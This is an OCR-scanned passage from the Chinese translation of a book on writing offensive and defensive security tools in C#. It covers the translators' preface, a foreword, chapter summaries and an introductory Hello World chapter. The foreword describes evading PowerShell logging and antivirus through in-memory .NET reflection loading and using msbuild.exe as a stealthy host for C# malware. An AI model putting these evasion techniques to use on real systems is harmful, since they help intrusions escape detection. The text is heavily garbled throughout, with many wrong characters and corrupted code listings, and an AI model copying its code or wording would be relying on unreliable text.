互联 网 的 快速 友 展 给 入 们 市 来 了 快捷 、 局 效 的 生产 生活 方式 。 随 着 互联 网 的 加 速 渗透 ， 网 络 已 成 为 一 个 继 海 、 陆 、 空 、 天 之 
后 与 人 类 生活 密切 相 天 的 第 五 空间 ， 成 为 现代 社会 不 可 或 缺 的 一 部 分 。 


各 种 各 样 丰富 多 彩 的 互联 网 应 用 在 吸引 大 量 用 户 的 同时 ， 也 将 自己 暴露 在 了 攻击 者 面前 。 震 网 病毒 、 校 镜 门 事件 、Hacking 
Team 被 黑 事 件 、 乌 克 兰 电网 系统 遭 攻击 事件 、 希 拉 里 邮件 门 、Mirai 病 毒 致使 美国 大 规模 断 网 事件 .…… 层 出 不 穷 的 网 络 安全 事件 
推动 着 网 络 安全 从 非 主流 走 同 主流 ， 从 附属 变 为 有 机 组 成 部 分 ， 网 络 安全 也 成 为 整个 安全 体系 的 重要 外 延 。 特 别 是 在 《网 络 安 全 
法 》 正 陈 颁 布 实施 之 后 ， 我 国 从 法 治 的 角度 将 网 络 安全 的 管理 提升 到 一 个 新 局 大 ， 对 网 络 建设 、 运 言 、 维 护 和 使 用 的 各 方 提 出 了 
具体 要 求 。 


少量 设备 的 渗透 测试 或 者 安全 防护 所 需 的 人 力 、 物 力 投 入 都 是 可 预期 的 。 但 如 果 设 备 数量 达到 一 定 的 规模 ， 任 何 组 织 和 个 人 
都 需要 面 对 量变 引起 质变 所 引 友 的 一 系列 问题 。 如 何 省 时 省 力 而 又 高 效 地 完成 各 项 网 络 安全 工作 是 每 一 位 网 络 安全 从 业 人 员 必 须 
要 解决 的 问题 。 


每 一 位 需要 渗透 测试 、 风 险 评估 的 安全 从 业 人 员 都 有 目 己 的 “武器 库 ”， 有 人 擅长 使 用 Metasploit， 有 人 喜欢 使 用 Nmap， 
也 有 人 喜欢 用 Nessus、OpenVAs。 面 对 大 量 的 结果 数据 ， 很 多 安全 人 员 都 有 过 “濒临 朋 溃 ”的 经 历 ， 很 多 人 都 针对 扫 摘 、 测 
试 、 分 析 等 事项 编写 了 目 己 的 小 工具 ， 以 求 优化 日 党 工作 。 只 不 过 有 的 人 喜欢 用 Python， 有 的 人 喜欢 用 C#。 选 择 何 种 语言 是 
个 “仁者 见 仁 智 者 见 智 ”的 事情 ， 如 果 要 展开 讨论 估计 会 争 个 面 红 耳 示 ， 三 天 三 夜 也 不 会 有 结论 。 


C# 语 言 能 够 跤 身 常 见 编 程 语言 之 列 ， 有 许多 先进 的 功能 和 特性 ， 可 以 用 来 处 理 复杂 的 数据 和 应 用 。 本 书 基 于 C# 语 言 强大 的 
核心 库 ， 上 略 加 改造 ， 通 过 编程 调用 Metasploit、OpenVAS、Nessus 等 渗透 测试 常见 工具 ， 来 自动 执行 那些 枯燥 但 又 比较 重要 、 
基础 的 工作 ， 如 漏洞 扫 摘 、 有 恶意 软件 分 析 以 及 事件 咽 应。 这样 既 能 提升 工作 的 趣味 性 ， 减 少 不 必 要 的 大 力 重 复 性 工作 ， 使 得 日 弟 
工作 流程 化 、 简 单 化 ， 也 切合 了 当前 渗透 测试 、 安 全 运营 的 DevSecOps 趋 势 ， 有 助 于 网 络 安 全 从 业 人 员 管 理 更 为 大 型 的 网 络 ， 
解决 更 多 的 安全 问题 。 


如 果 你 是 一 名 希望 从 事 网 络 安全 工作 的 新 手 ， 那 么 可 跟随 本 书 的 指导 ， 更 快 地 学 到 如 何 用 C# 来 编程 实现 一 些 工具 的 优化 其 
至 目 动 化 ; 如 果 你 是 一 名 经 验 丰 语 的 网 络 安全 从 业者 ， 也 可 根据 本 书 的 提示 ， 结 合 工 作 实 战 经 验 ， 编 写 出 更 满足 目 己 需求 的 程 
序 ， 让 你 的 网 络 安全 工作 如 虎 添 蝇 。 


本 书 主要 由 王 上 自 亮 、 候 敬 宜 、 李 伟 完 成 翻译 。 我 们 力求 做 到 在 技术 术语 准确 的 前 提 下 给 读者 市 来 最 佳 的 阅读 体验 ， 但 限于 水 
平 ， 难 免 有 错误 或 玖 漏 ， 晨 请 广大 读者 朋友 批评 指正 。 


序 


攻防 双方 在 软件 开 友 的 过 程 中 显然 都 需要 决定 哪 种 语言 最 适用 。 理 想 情 况 下 一 种 语言 不 会 仅仅 简单 地 因为 开 友 人 员 最 喜欢 而 
馈 选 中 。 确 定 选 择 某 种 语言 基于 如 下 一 系列 问题 : 


. 我 的 主要 目标 执行 环境 是 什么 ? 


: 以 这 种 语言 编写 的 有 效 载荷 的 检测 和 记录 状态 是 什么 ? 
我 的 软件 需要 保持 隐藏 在 什么 级 别 ( 例 如 内 存 驻 留 ) ? 
: 客户 端 和 服务 器 端的 支持 情况 如 何 ? 

: 是 否 有 一 个 大 的 社区 正在 开发 这 门 语言 ? 

` 这 种 语言 的 学 习 曲 线 如 何 ， 可 维护 性 怎样 ? 


对 这 些 问题 C# 有 一 些 令 人 信服 的 答案 。 关 于 目标 执行 环境 的 问题 ，.NET 应 该 是 在 Windows 环 境 下 的 最 佳 候选 者 ， 因 为 它 已 
经 和 Windows 打 包 在 一 起 很 多 年 了 。 但 是 随 着 .NET 的 开源 ，C# 现 在 成 为 可 以 在 每 种 操作 系统 上 运行 的 语言 ， 目 然 C# 应 该 是 真 


正 的 跨 平台 语言 。 


C# 一 直 是 .NET 语 言 的 通用 语言 。 正 如 本 书 将 会 介绍 的 那样 ， 由 于 其 门槛 低 ， 开 及 人 员 众多 ， 你 将 很 快 残 能 编写 C# 代 码 运行 
程序 。 此 外 ， 由 于 .NET 是 一 种 托管 的 类 型 丰富 的 语言 ， 编 译 后 的 程序 集 可 以 简单 地 反 编译 为 C#。 因 此 ， 编 写 攻 击 性 C# 代 码 不 一 
定 需要 从 零 开 始 ， 而 是 可 以 从 大 量 的 .NET 有 恶 意 软 件 样本 中 获取 反 编译 的 代码 ， 阅 读 相应 的 源 代码 并 “借用 ”它们 的 功能 ， 甚 至 
可 以 使 用 .NET 肥 射 API 动 态 加 载 和 执行 现 有 的 .NET 有 恶意 软件 样本 一 当然， 假设 它们 已 经 家 逆向 以 确保 不 会 做 任何 夏 坏 。 


有 人 花 了 很 长 时 间 将 PowerShell 引 入 主流 市 场 ， 在 PowerShell 恶 意 软件 激增 之 后 ， 我 的 努力 带 来 了 大 量 的 安全 改进 和 日 志 
功能 。 最 新 版 本 的 PowerShell (截至 撰写 本 书 时 ， 最 新 版 本 为 v5) 实现 了 比 其 他 任何 脚本 语言 更 多 的 日 志 记 录 功 能 。 从 防守 角 
度 来 看 ， 这 太 棒 了。 从 一 个 渗透 测试 者 、 红 队 成 员 ， 或 对 手 的 角度 来 看 ， 这 显著 提高 了 攻击 者 的 门 朴 。 对 于 一 本 关于 C# 的 书 ， 
我 为 什么 要 提 到 这 个 ? 我 花 了 多 年 的 时 间 意 识 到 ，PowerShell 写 得 越 多 就 越发 现 ， 攻 击 者 通过 在 C# 中 而 不 是 在 PowerShell 中 开 
发 工具 ， 不 会 受到 那么 严格 的 限制 ， 从 而 可 以 获得 更 高 的 灵活 性 。 请 允许 我 解释 一 下 : 


.NET 提供 了 丰富 的 反射 API， 允 许 用 户 轻松 地 在 内 存 中 加 载 和 动态 地 与 已 编译 的 C# 程 序 集 进行 交互 。 在 PowetShell 有 效 载 
荷 上 执行 所 有 额外 的 检查 后 ， 反 射 API 使 攻击 者 可 以 通过 开发 仅 用 作 .NET 程 序 集 加 载 器 和 运行 器 的 PowerShell 有 效 载荷 以 更 好 地 


躲避 检测 。 


` 正如 Casey Smith ((@subTee) 所 演示 的 那样 ， 默 认 安 装 的 Windows 上 有 许多 合法 的 Microsoft 签 名 的 可 作为 C# 有 效 载 荷 的 绝 
佳 的 循 主 进程 二 进 制 文件 


msbuild.exe 


` 是 最 隐藏 的 宿主 进程 。 使 用 MSBuild 作 为 C# 恶 意 软 件 的 宿主 进程 完美 体现 了 “不 落地 ”的 特点 ， 即 攻击 者 可 以 融入 目标 环 
境 并 占用 最 小 的 空间 ， 且 长 时 间 驻 留 。 


. 到 目前 为 止 ， 反 病毒 厂商 仍 不 太 了 解 运 行 时 .NET 程 序 集 的 功能 。 那 里 仍然 有 足够 的 非 托 管 恶意 代码 ， 焦 点 还 没有 转移 到 
有 效 地 挂钩 .NET 运 行 时 执行 动态 运行 时 检查 。 


. C# 有 庞大 的 .NET 类 库 ， 那 些 熟悉 PowerShell 的 人 将 会 发 现 向 C# 的 过 渡 相 对 平滑 ， 反 过 来 ， 那 些 熟悉 C# 的 人 在 将 其 技能 转 


移 到 其 他 .NET 语 言 (如 PowerShell 和 F#) 时 的 门槛 更 低 。 


. 与 PowefShell 一 样 ，C# 也 是 一 种 高 级 语言 ， 这 意味 着 开发 人 员 不 必 关 心底 层 编码 工作 和 内 存 管理 范例 ， 但 是 ， 有 时 候 需 要 
底层 编码 (例如 ， 与 Win32API 交 互 ) 。 幸 运 的 是 ， 通 过 反射 API 和 P/Invoke 和 封 送 处 理 接口 ，C# 可 以 根据 需要 获得 底层 编码 能 
力 。 


每 个 人 学 习 C# 的 动机 不 同 。 我 的 动机 是 需要 扩展 PowersShell 技 能 以 便 在 更 多 平台 上 更 灵活 地 使 用 .NET 代 码 。 有 的 读者 可 能 
想 扩 充 C# 拉 能 来 获取 攻击 者 的 思维 ， 有 的 读者 可 能 希望 将 现 有 的 攻击 者 思维 应 用 于 多 种 平台 上 上。 无论 你 的 动机 是 什么 ， 准 备 好 
通过 本 书 来 一 次 狂 野 之 旅 吧 ! 本 书 作者 为 C# 攻 防 工具 开发 提供 了 独特 的 经 验 和 智慧 。 


Matt Graeber 


Microsoft MVP 


很 多 人 问 我 为 什么 喜欢 C#。 我 原本 是 一 个 开源 软件 的 文 持 者 、 忠 实 的 Linux 用 户 和 Metasploit 的 贡献 者 (主要 使 用 Ruby 编 
写 ) ， 然 而 我 却 把 C# 当 作 我 最 喜欢 的 语言 ， 这 似乎 很 奇怪 。 这 是 为 什么 呢 ? 许多 年 前 ， 当 我 开始 使 用 C# 的 时 候 ，Miguel de 
lIcaza ( 因 GNOME 出 名 ) 开始 了 一 个 叫 作 Mono 的 小 项 目 。 在 本 质 上 ，Mono 是 一 个 Microsoft.NET 框 架 的 开源 实现 。C# 被 提 
交 为 ECMA 标 准 ， 微 软 将 其 吹捧 为 替代 Java 的 框架 (因为 C# 代 码 可 以 在 一 个 系统 或 平台 上 编译 并 在 其 他 地 方 运行 ) ， 唯 一 的 问 
题 是 微软 只 为 Windows 操 作 系 统 友 布 了 .NET 框 架 。Miguel 和 一 小 群 核心 页 献 者 接受 了 使 Mono 项 目 成 为 .NET 到 达 Linux 社 区 的 
桥梁 的 重任 。 玛 运 的 是 ,我 的 一 个 朋友 建议 我 学 习 C#， 但 是 他 也 知道 我 对 Linux 很 感 兴趣 ， 他 为 我 指明 了 这 个 刚刚 起 步 的 项 目的 
方向 ， 看 看 我 是 否 可 以 同时 使 用 C# 和 Linux。 之 后 ， 我 被 C# 深 深 吸 引 了 。 


C# 是 一 种 优雅 的 语言 ，C# 的 友 明 者 和 主要 染 构 师 Anders Hejlsberg 曾 经 为 Pascal 编 写 编译 器 ， 然 后 为 Delphi 编 写 编 译 器 ， 
这 些 经 历 使 他 对 各 种 编程 语言 的 真正 特点 有 深刻 的 理解 。Hejlsberg 加 入 微软 之 后 ， 于 2000 年 左右 推出 了 C#。 早 年 ，C# 与 java 
共享 了 很 多 语言 特性 ， 比 如 Java 的 语法 细节 ， 但 是 随 着 时 间 的 推移 ，C# 目 成 一 派 ， 并 早 于 Java 引 入 了 一 大 堆 功 能 ， 例 如 LINQ、 
代理 和 匿名 方法 。 使 用 C#， 你 可 以 使 用 许多 C 和 C++ 的 强大 特性 ， 可 以 使 用 ASP.NET 栈 或 丰富 的 桌面 应 用 程序 编写 完整 的 Web 
应 用 程序 。 在 Windows 上 ，WinForms 是 UIl 库 的 首选 ， 但 对 于 Linux 来 说 ，GTK 和 QT 库 更 易于 使 用 。 最 近 ，Mono 已 经 可 以 在 
OS xX 平台 上 支持 Cocoa 工 具 包 ， 甚 至 支持 iPhone 和 Android。 


为 什么 信任 Mono 


贬低 Mono 项 目 和 C# 语 言 的 人 声称 ，Mono 等 技术 如 果 在 非 Windows 的 任何 平台 上 使 用 都 是 不 安全 的 。 他 们 认为 微软 将 会 
停止 开发 Mono， 使 Mono 被 遗志 到 许多 人 都 不 会 严肃 谈论 这 个 项 目的 程度 。 我 不 认为 这 是 一 个 风险 。 在 撰写 本 书 时 ， 微 软 不 仅 
收购 了 Xamarin 公 司 (该 公司 由 Miguel de lcaza 创 建 以 支持 Mono 框 架 ) ， 而 且 微 软 拥有 大 量 的 开源 的 核心 .NET 框 架 。 在 
Steve Ballmer 的 领导 下 ， 微 软 还 以 许多 令 人 难以 想象 的 方式 接受 了 开源 软件 。 新 任 首 局 执行 官 Satya Nadella 表 示 ， 微 软 与 开源 
软件 对 接 根本 没有 任何 问题 ， 建 议 各 种 公司 要 积极 参与 Mono 社 区 ， 以 便 使 用 微软 的 技术 来 进行 移动 开 友 。 


本 书 的 读者 对 象 


在 网 络 和 应 用 安全 工程 师 中 ， 许 多 人 在 一 定 程 度 上 依赖 目 动 化 地 扫描 漏洞 或 分 析 有 恶意 软件 。 因 为 有 很 多 安全 专业 人 员 训 欢 使 
用 各 种 操作 系统 ， 所 以 编写 每 个 人 都 可 以 轻松 运行 的 工具 可 能 很 困难 。Mono 是 一 个 不 错 的 选择 ， 因 为 它 是 跨 平 台 的 ， 并 且 有 一 
个 优秀 的 核心 库 集合 ， 使 安全 专业 人 员 将 各 种 工作 目 动 化 变 得 简单 。 如 果 你 有 兴趣 学 习 如 何 编写 攻击 性 的 Exploit、 目 动 扫 摘 基 
础 设施 的 漏洞 、 反 纲 译 其 他 .NET 应 用 程序 、 读 取 离 绪 注 册 表 配置 单元 、 创 建 目 定义 跨 平 台 载 傈 ， 那 么 本 书 涵 善 的 许多 内 容 都 会 
让 你 快速 入 | 门 (即使 你 没有 C# 的 使 用 背景 ) 。 


本 书 的 主要 内 容 


在 本 书 中 ， 我 们 将 介绍 C# 的 基础 知识 ， 然 后 使 用 合适 的 、 丰 富 的 库 快 速 实 现实 际 能 用 的 安全 工具 。 在 应 用 程序 之 外 ， 我 们 
会 编写 模糊 工具 来 找到 可 能 的 漏洞 ， 并 编写 代码 对 友 现 的 任何 漏洞 进行 全 面 利 用 。 你 将 看 到 C# 语 言 特性 和 核心 库 的 强大 功能 。 
一 旦 学 习 了 基础 知识 ， 我 们 将 自动 化 目前 流行 的 安全 工具 ， 比 如 Nessus、Sqlmap 和 Cuckoo Sandbox。 总 之 ， 在 读 完 本 书后 ， 
你 将 有 一 个 包含 库 的 执行 方案 列表 ， 将 许多 安全 专业 人 员 经 弟 执 行 的 工作 上 自动 化 。 


第 1 章 : C# 基 础 知识 速成 


在 这 一 章 中 ， 我 们 通过 简单 的 例子 介绍 C# 面 向 对 象 编程 的 基础 知识 ， 但 同时 履 关 了 各 种 各 样 的 C# 导 性 。 我 们 从 一 个 Hello 
World 程 序 开始 ， 然 后 构建 小 的 类 ， 以 便 更 好 地 了 解 面向 对 象 的 概念 ， 然 后 介绍 更 高 级 的 C# 特 性 ， 例 如 匿名 方法 和 P/Invoke。 


第 2 章 : 模糊 测试 和 漏洞 利用 技术 


在 这 一 草 中 ， 我 们 使 用 各 种 数据 类 型 编写 了 一 个 寻找 XSS 和 SQL 注 入 的 小 型 HTTP 请 求 模糊 工具 (通过 HTTP 库 与 Web 服 务 器 


通信 ) 。 
第 3 章 : 对 SOAP 终 端 进 行 模糊 测试 


在 这 一 章 中 ， 我 们 采用 前 几 章 介绍 的 模糊 测试 工具 概念 ， 编 写 了 另 一 个 小 型 模糊 测试 工具 ， 通 过 自动 生成 HTTP 请 求 来 检索 
和 解析 SOAP WSDL， 以 查找 潜在 的 SQL 注入 。 


同时 该 章 也 会 介绍 如 何 从 标准 库 中 获得 优秀 XML 库 。 


第 4 章 : 编写 有 效 载 何 


在 这 一 章 中 ， 我 们 将 重点 放 在 HTTP 上 ， 继 续 编写 有 效 载 何 。 我 们 首先 创建 几 个 简单 的 有 效 载 答 个 通过 TCP， 另 一 个 


通过 UDP。 然 后 学 习 如 何在 Metasploit 中 生成 X86/x86-64shellcode 来 创建 跨 平 台 和 跨 架 构 的 有 效 载荷 。 
第 5 章 : 自动 化 运行 Nessus 


在 这 一 章 中 ， 为 了 将 几 个 漏洞 扫描 程序 自动 化 ， 我 们 回 到 HTTP (第 一 个 是 Nessus) ， 通 过 编程 了 解 如 何 创建 、 观 察 和 报告 
CIDR 扫 换 的 沁 围 。 


第 6 章 : 自动 化 运行 Nexpose 


在 这 一 章 中 ， 我 们 继续 专注 于 工具 自动 化 ， 只 不 过 转 到 Nexpose 漏 洞 扫描 器 上 。Nexpose 的 API 也 是 基于 HTTP 的 ， 可 以 自 
动 化 扫 摘 漏洞 并 创建 报告 。Rapid7 是 Nexpose 的 创始 人 ， 为 其 社区 产品 提供 一 年 免费 的 许可 证 ， 这 对 业余 爱好 者 非常 有 用 。 


第 7 草 : 自动 化 运行 OpenVAS 


在 这 一 章 中， 我们 专注 于 使 用 开源 的 OpenVAs 使 漏洞 扫 摘 目 动 化 。OpenVAs 的 API 仅 使 用 TCP 套 接 字 和 XML 实现 通信 协 
议 ， 从 根本 上 与 Nessus 和 Nexpose 不 同 。 因 为 它 也 是 免费 的 ， 所 以 对 于 希望 通过 有 限 的 预算 获得 更 多 的 漏洞 扫 摘 经 验 的 爱好 者 
来 说 很 有 用 。 


第 8 曹 : 自动 化 运行 Cuckoo Sandbox 


在 这 一 章 中 ， 我 们 将 使 用 Cuckoo Sandbox 进 行 数字 取证 。 使 用 易 用 的 REST JSON API 目 动 提交 洪 在 的 琉 意 软件 样本 ， 然 
后 报告 结果 。 


第 9 章 : 自动 化 运行 sqlmap 


在 这 一 章 中， 我 们 通过 目 动 化 执行 sqlImap， 最 大 限度 地 上 友 挥 SQL 注入 的 危害 。 首 先 编写 一 些小 工具 ， 使 用 与 sqlmap 一 起 友 
送 的 易 用 的 JSON API 提 交 单 个 URL。 一 旦 熟悉 了 sqlmap， 我 们 会 将 其 集成 到 第 3 草 介 绍 的 OAP W3sDL 异 糊 测试 工具 中 ， 目 动 
利用 和 验证 任何 潜在 的 SQL 注 入 漏洞 。 


第 10 章 : 自动 化 运行 ClamAV 


在 这 一 章 中 ， 我 们 开始 关注 与 本 机 的 非 托管 库 进行 交互 。ClamAV 是 一 个 受 欢 迎 的 开源 反 病 毒 项 目 ， 虽 然 不 是 用 .NET 语 言 编 
写 的 ,但 是 我 们 仍然 可 以 与 其 核心 库 以 及 TCP 守 护 进 程 交 互 ， 这 将 允许 远程 使 用 。 我 们 会 在 这 两 种 情况 下 介绍 如 何 将 ClamAV 目 
动 化 。 


第 11 草 : 自动 化 运行 Metasploit 

在 这 一 章 中 ， 我 们 重点 介绍 Metasploit， 学 习 如 何 通 过 配 有 核心 框架 的 MSGPACK RPC 以 编程 的 方式 利用 和 报告 植 入 shell 
的 主机 。 

第 12 草 : 自动 化 运行 Arachni 

在 这 一 章 中 ， 我 们 关注 通过 汉 重 许可 配置 黑 盒 Web 应 用 程序 扫 摘 器 Arachni， 这 是 一 个 免费 开源 的 项 目 。 使 用 更 简单 的 
REST HTTP API 和 随 附 项 目 更 强大 的 MSGPACK RPC， 编 写 一 些 在 扫 摘 URL 时 上 自动 报告 调查 结果 的 小 工具 。 

第 13 章 : 反 编 译 和 逆向 分 析 托 管 程序 集 

在 这 一 章 中 ， 我 们 进行 逆向 工程 。 在 Windows 上 有 易于 使 用 的 .NET 反 编译 器 ， 但 不 适用 于 Mac 或 Linux， 所 以 我 们 自己 写 
一 个 小 的 反 编译 器 。 

第 14 章 : 读 取 离线 注册 表 项 


在 这 一 章 中， 我 们 通过 检查 二 进 制 结构 的 Windows 注 册 表 ， 将 注意 力 集中 在 注册 表 项 上 ， 从 而 转向 事件 啊 应 。 学 习 如 何 解 
析 和 读 取 离 线 注册 表 项 ， 可 以 检索 系统 启动 密码 ， 它 存储 在 注册 表 中 ， 用 于 加 密 密 码 的 散 列 。 


人 致 油 


可 以 说 ， 写 这 本 书 花 了 10 年 时 间 ! 虽然 在 电脑 上 我 只 写 了 3 年 。 我 的 家 人 和 朋友 肯定 注意 到 我 一 直 在 不 断 地 谈论 C#， 但 是 他 
们 非常 宽容 并 理解 我 ， 成 为 我 的 超级 耐心 的 听众 。AHA 的 只 甫 姐妹 们 给 了 我 这 本 书 中 许多 项 目的 灵感 ， 是 本 书 的 重要 文 柱 。 非 
常 感谢 John Eldridge， 一 位 亲密 的 朋友 ， 是 他 市 我 进入 C# 世 界 ， 激 友 了 我 对 编程 的 兴趣 。Brian Rogers 一 直 是 我 最 好 的 技术 资 
源 之 一 ， 在 本 书 的 编写 过 程 中 ， 我 们 的 思想 产生 了 许多 碰撞 ， 并 得 到 很 多 局 上 有 友 ， 他 也 是 一 个 拥有 敏 铝 眼光 和 见解 的 优秀 的 扩 术 编 
辑 。 我 的 产品 经 理 Serena Yang 和 Alison Law 减 轻 了 我 反复 修改 书稿 的 痛苦 。 当 然 ，Bil Pollock 和 Jan Cash 把 我 模糊 的 表述 变 
成 了 每 个 人 都 可 以 读 懂 的 清晰 的 句子 。 非 常 感谢 No Starch 的 全 体 工作 人 员 ! 


最 后 的 况 明 


本 书 所 介绍 的 内 容 远 远 不 能 反映 C# 的 强大 功能 和 构建 自动 化 工具 的 潜力 ， 特 别 是 因为 我 们 创建 的 许多 库 是 灵活 的 、 可 扩展 
的 。 我 希望 这 本 书展 示 了 将 常用 的 或 烦 琪 的 任务 目 动 化 是 多 么 简单 ， 并 鼓励 你 继续 完善 我 们 创造 的 工具 。 可 以 
在 https://www.nostarch.comy/grayhatcsharp 乒 到 本 书 的 源 代 码 和 更 新 。 


第 1 章 “# 基 础 如 识 速 成 


与 Ruby、Python、Perl 等 语言 不 同 ，C# 程 序 默 认可 以 在 所 有 Windows 操 作 系 统 上 运行 。 另 外 ， 在 如 Ubuntu、Fedora 或 
其 他 Linux 系 统 上 运行 C# 编 写 的 程序 也 很 简单 ， 特 别 是 自从 可 以 通过 如 apt 或 yum 的 大 多 数 的 Linux 包 管理 器 安装 Mono 之 后 更 是 
如 此 。 这 使 得 C# 与 大 多 数 语 言 相 比 能 够 更 好 地 满足 跨 平台 的 需求 ， 因 为 C# 拥 有 易于 获取 的 简单 而 强大 的 标准 库 。 总 而 言 之 ，C# 
和 Mono/.NET 库 为 任何 想 要 快速 轻松 地 编写 跨 平 台 工具 的 人 创建 了 一 个 不 能 拒绝 的 框架 。 


1.1 选择 IDE 


大 多 数 想 要 学 习 C# 的 人 将 使 用 Visual Studio 这 样 的 IDE (Integrated Development Environment， 集 成 开发 环境 ) 编写 
和 编译 代码 。 微 软 的 Visual studio 在 全 球 是 C# 开 上 的 事实 上 的 标准 。 如 Visual Studio 社 区 版 这 样 的 免费 版 本 可 供 个 人 使 用 ， 可 
以 从 微软 的 网 站 https://www.visualstudio.com/downloads/ 上 下 载 。 


在 这 本 书 的 写作 过 程 中 ， 我 使 用 了 MonoDevelop 和 Xamarin Studio， 这 取决 于 我 是 用 Ubuntu 还 是 OS X。 在 Ubuntu 上 ， 
可 以 使 用 apt 包 管理 器 轻松 安装 MonoDevelop。MonoDevelop 由 Xamarin 维 护 ， 该 公司 也 维护 Mono。 要 安装 它 ， 请 使 用 以 下 


从 和 作 。 
pp : 


$ sudo apt-get install monodevelop 


Xamarin Studio 是 MonoDevelop IDE 的 OS X 版 。Xamarin Studio 和 MonoDevelop 具 有 相同 的 功能 ， 但 用 户 界面 稍 有 不 
同 。 你 可 以 从 Xamarin 的 网 站 https://www.xamarin.com/download-it/ 上 下 载 Xamarin Studio 1DE 安 装 程序 。 


这 两 个 1DE 中 的 任何 一 个 都 能 满足 我 们 在 本 书 中 的 需求 。 其 实 如 果 你 只 想 用 vim， 你 甚至 不 需要 一 个 1DE! 我 们 也 将 尽快 介绍 
如 何 使 用 Mono 附 市 的 命令 行 C## 编 译 器 而 不 是 IDE 编 译 一 个 简单 的 示例 程序 。 


1.2 ”一 个 简单 的 例子 


对 于 使 用 过 C 或 Java 的 人 来 讽 ，C# 的 语法 看 起 来 似乎 非 钊 熟悉。 与 C 和 Java 一 样 ，C# 是 一 个 强 类 型 的 语言 ， 这 意味 看 一 个 变 
量 在 代码 中 的 声明 只 能 有 一 种 类 型 ( 整 型 、 字 符 串 或 者 Dog 类 ) 并 且 永 远 是 那 种 类 型 ， 不 管 那 种 类 型 是 什么 。 我 们 先 来 快速 看 看 
清单 1-1 中 的 Hello World 示 例 ， 访 示例 展示 了 一 些 C# 基 本 的 类 型 和 语法 。 


清单 1-1: 一 个 基础 的 Hello World 程 序 


using @9System; 
namespace @ch1 hello world 
class @MainClass 


public static void @Main(string[ | @args ) 


I 
© string hello = “Hello Nor1d! ; 


@ DateTime now = DateTime.Now; 
©@ Console.Write(hello); 
© Console.WritelLine(" The date is ”+ now.ToLongDateString()); 


} 
} 
} 


一 开始 束 需 要 导入 将 要 使 用 的 命名 空间 Q@@， 即 用 using 声 明 导 入 System 命 名 空间 。 类 似 于 C 中 的 #include，Java 和 和 Python 
中 的 import，Ruby 和 和 Perl 中 的 require， 这 能 允许 我 们 访问 程序 中 的 库 。 声 明 要 使 用 的 库 之 后 ， 应 声明 类 存在 的 命名 空间 @。 


与 C (以 及 较 旧 版 本 的 Perl) 不 同 ，C# 是 面向 对 象 的 语言 ， 类 似 于 Ruby、Python 和 Java。 这 意味 着 我 们 可 以 在 编写 代码 的 
同时 编写 复杂 的 类 来 表示 数据 结构 以 及 数据 结构 的 方法 。 命 名 空间 让 我 们 的 类 和 代码 组 织 起 来 并 且 防 止 潜在 的 名 称 冲 突 ， 比 如 两 
个 程序 员 创 建 了 具有 相同 名 称 的 两 个 类 。 如 果 两 个 具有 相同 名 称 的 类 在 不 同 的 命名 空间 中 ， 那 就 不 会 有 什么 问题 了 。 每 个 类 都 需 
要 有 一 个 命名 空间 。 

有 了 命名 空间 ， 我 们 可 以 声明 一 个 类 @ 实 现 Main () 方法 @。 如 前 所 述 ， 通 过 类 可 以 创造 复杂 的 数据 类 型 以 及 与 真实 世界 
中 的 对 象 更 匹配 的 数据 结构 。 在 这 个 例子 中 ， 类 的 名 字 并 不 重要 ， 它 只 是 用 来 包含 Main () 方法 ，Main () 方法 才 是 重点 。 
为 在 运行 示例 应 用 程序 时 要 执行 Main () 方法 。 每 个 C# 应 用 程序 都 需要 一 个 Main () 方法 ， 就 像 C 和 Java 一 样 。 如 果 你 的 CC# 
应 用 程序 接受 命令 行 参数 ， 可 以 使 用 args 变 量 @ 访 问 传递 给 应 用 程序 的 参数 。 


C# 中 存在 如 字符 串 @ 这 样 的 简单 数据 结构 ， 也 能 创建 诸如 表示 日 期 和 时 间 Q@ 的 类 的 更 复杂 的 数据 结构 。DateTime 类 是 处 理 
日 期 的 核心 C# 类 。 在 我 们 的 例子 中 ， 使 用 它 把 当前 的 日 期 和 时 | 间 (DateTime.Now) 和 存储 在 变量 now 中。 最后， 使 用 声明 的 变 


J 二 扩 三 


量 和 Console 类 的 Write () @ 和 WriteLine () @ 方 法 可 以 输出 一 条 友好 的 信息 (后 者 末尾 包括 换行 符 ) 。 


如 果 你 使 用 的 是 IDE， 则 可 以 通过 单 击 运行 按钮 编译 并 运行 代码 ， 它 位 于 1DE 的 左上 角 ， 看 起 来 像 一 个 播放 按钮 。 按 F5 键 也 
可 以 运行 代码 。 但 是 ， 如 果 你 想 使 用 Mono 编 译 器 从 命令 行将 源 代码 编译 ， 也 可 以 很 容易 地 实现 。 从 你 的 C# 类 的 代码 的 目录 
中 ， 使 用 Mono 附 之 的 mcs 工 具 将 类 编译 成 可 执行 文件 ， 如 下 代码 所 示 : 


$ mcs Main.cs -out:ch1 hello world.exe 


运行 清单 1-1 中 的 代码 应 该 在 同一 行 打 印字 符 串 “Hello World! ”和 当前 日 期 ， 如 清单 1-2 所 示 。 在 一 些 Unix 系 统 上 ， 你 可 


能 需要 运行 mono ch1 _ hello world.exe。 
清单 1-2: 运行 Hello World 应 用 程序 


$ ./ch1 hello world.exe 
Hello World! The date is Wednesday, June 28, 2017 


饮 锅 你 成 功 编写 运行 了 第 一 个 C# 程 序 ! 


1.3 ”类 和 接口 


类 和 接口 用 于 创建 只 用 内 置 的 结构 难以 表示 的 复杂 的 数据 结构 。 类 和 接口 可 以 有 属性 ， 它 们 是 获取 或 设置 类 或 接口 的 值 的 变 
;也 可 以 有 方法 ， 它 们 类 似 于 在 类 (或 子 类 ) 或 接口 上 执行 的 立 数 ， 并 且 是 唯一 的 。 属 性 和 万 法 用 于 表示 关于 对 象 的 数据 。 例 
如 ， 一 个 Firefighter 类 可 能 需要 一 个 int 类 型 的 属性 代表 消防 员 的 养老 金 或 一 个 告诉 消防 员 前 往 火 灾 友 生地 点 的 万 法 。 


Wl 


类 可 以 用 作 蓝 图 来 创建 其 他 类 ， 这 种 技术 称 为 子 类 化 。 当 一 个 类 对 另 一 个 类 进行 子 类 化 时 ， 它 会 继承 该 类 的 属性 和 万 法 (该 
类 称 为 父 类 ) 。 接 口 也 被 用 作 新 类 的 蓝图 ， 但 与 类 不 同 ， 它 们 没有 继承 。 因 此 ， 实 现 接口 的 基 类 子 类 化 之 后 不 会 给 子 类 传递 接口 
的 属性 和 方法 。 


1.3.1 创建 一 个 类 


我 们 将 创建 如 清单 1-3 所 示 的 简单 的 类 作为 一 个 表示 公务 员 的 数据 结构 的 例子 ， 它 们 使 我 们 的 生活 更 轻松 美好 。 
清单 1-3: PublicServant 抽 象 类 


public @abstract class PublicServant 


{ 
public int @PensionAmount { get; set; } 


public abstract void @DriveToPlaceOfInterest(); 
]l 


